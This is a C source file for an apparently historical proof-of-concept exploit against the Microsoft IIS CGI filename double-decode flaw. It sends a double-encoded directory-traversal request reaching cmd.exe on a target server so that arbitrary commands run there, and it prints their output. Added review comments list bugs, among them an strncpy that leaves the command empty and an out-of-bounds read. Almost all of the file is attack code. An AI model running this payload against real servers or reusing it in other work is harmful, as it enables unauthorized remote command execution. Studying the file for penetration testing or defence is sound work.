/*
*
* execiis.c - (c)copyright Filip Maertens
* BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
*
* DISCLAIMER: This is proof of concept code. This means this code
* may only be used on approved systems in order to test the availability
* and integrity of machines during a legal penetration test. In no way
* is the author of this exploit responsible for the use and result of
* this code.
*
*/
/* Might as well port this one too.
* vacuum@technotronic.com
*/
#include <stdio.h>
#include <stdlib.h>
#ifdef WIN32
#pragma comment (lib,"Ws2_32")
#include <windows.h>
#include <winsock.h>
#define close closesocket
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#endif
#include <sys/types.h>
#include <string.h>
/*
 * Entry point: resolves argv[1], opens a TCP connection to port 80, sends
 * the request assembled below and echoes the reply byte by byte.
 *
 * Review notes (code left byte-for-byte as found; observations only):
 *  - gethostbyname(), struct hostent and herror() are declared in <netdb.h>
 *    on POSIX systems, which this file never includes; the non-WIN32 build
 *    therefore relies on an implicit declaration that C99 and later reject.
 *  - `sin` is never zeroed, so its padding (sin_zero) reaches connect()
 *    uninitialized.
 *  - exit(-1) yields an implementation-defined status (255 on most
 *    systems); EXIT_FAILURE would be portable.
 */
int main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *ht;
char recvbuffer[1];   /* one byte: can never hold a NUL-terminated string, see the strstr() call below */
int create_socket;
#ifdef WIN32
WSADATA WSAData;
#endif
char request[8192]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
char cmd[1024]="";    /* starts empty; note the strncpy() length argument below */
printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |\n");
printf("<filip@securax.be>\n");
if (argc < 3)
{
printf(" -- Usage: iisexec [hostname] [command]\n");
exit(-1);
}
#ifdef WIN32
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
printf("WSAStartup failed.\n");
WSACleanup();
exit(-1);
}
#endif
/* Resolve the target name; only the first returned address is used. */
if ((ht = gethostbyname(argv[1])) == 0)
{
#ifndef WIN32
herror(argv[1]);
#else
fprintf(stderr, "Unable to resolve host %s\n",argv[1]);
#endif
exit(-1);
}
else
memcpy(&sin.sin_addr, ht->h_addr_list[0], sizeof(sin.sin_addr));
/* Only the success message is conditional: a failed socket() (-1) is not
 * handled, and execution continues into connect() with that descriptor. */
if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf(" -- Socket created.\n");
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf(" -- Connection made.\n");
else
{
printf(" -- No connection.\n");
exit(1);
}
/* Modify this value to whichever sequence you want.
*
* %255c = %%35c = %%35%63 = %25%35%63 = /
*
*/
/* NOTE(review): the length argument is strlen() of the *destination*, which
 * is 0 here because cmd was initialised to "", so this call copies nothing
 * and cmd stays empty for the rest of the function. */
strncpy(cmd, argv[2], strlen(cmd));
/* strncpy() with the full buffer size NUL-pads the remainder of request;
 * the literal is far shorter than 8192 bytes, so the result is terminated. */
strncpy(request,
"GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+",
sizeof(request));
/* strncat()'s count excludes the terminating NUL it writes, so a bound of
 * sizeof(request) - strlen(request) allows the terminator to land one byte
 * past the end of request; the usual bound is one less than that. */
strncat(request, cmd, sizeof(request) - strlen(request));
strncat(request, "\n", sizeof(request) - strlen(request));
memset(recvbuffer, '\0',sizeof(recvbuffer));
printf("[%s]\n",request);
/* Sends the entire 8192-byte array (padding NULs included), not
 * strlen(request) bytes; the return value is not checked. */
send(create_socket, request, sizeof(request), 0);
/* Reads a single byte; the return value (0 on EOF, -1 on error) is ignored. */
recv(create_socket, recvbuffer, sizeof (recvbuffer),0);
/* NOTE(review): recvbuffer is one byte and the byte just received is not
 * followed by a NUL inside the array, so strstr() reads past the end of
 * recvbuffer (out-of-bounds read) unless that byte happens to be 0. A
 * three-character match can also never fit in a one-byte buffer, so the
 * "404" branch below is effectively unreachable. */
if ( ( strstr(recvbuffer,"404") == NULL ) )
{
printf(" -- Command output:\n\n");
/* Echo the reply one byte at a time until the peer closes or recv() fails. */
while(recv(create_socket, recvbuffer, 1, 0) > 0)
{
printf("%c", recvbuffer[0]);
}
}
else
printf(" -- Wrong command processing. \n");
close(create_socket);
exit(0);
}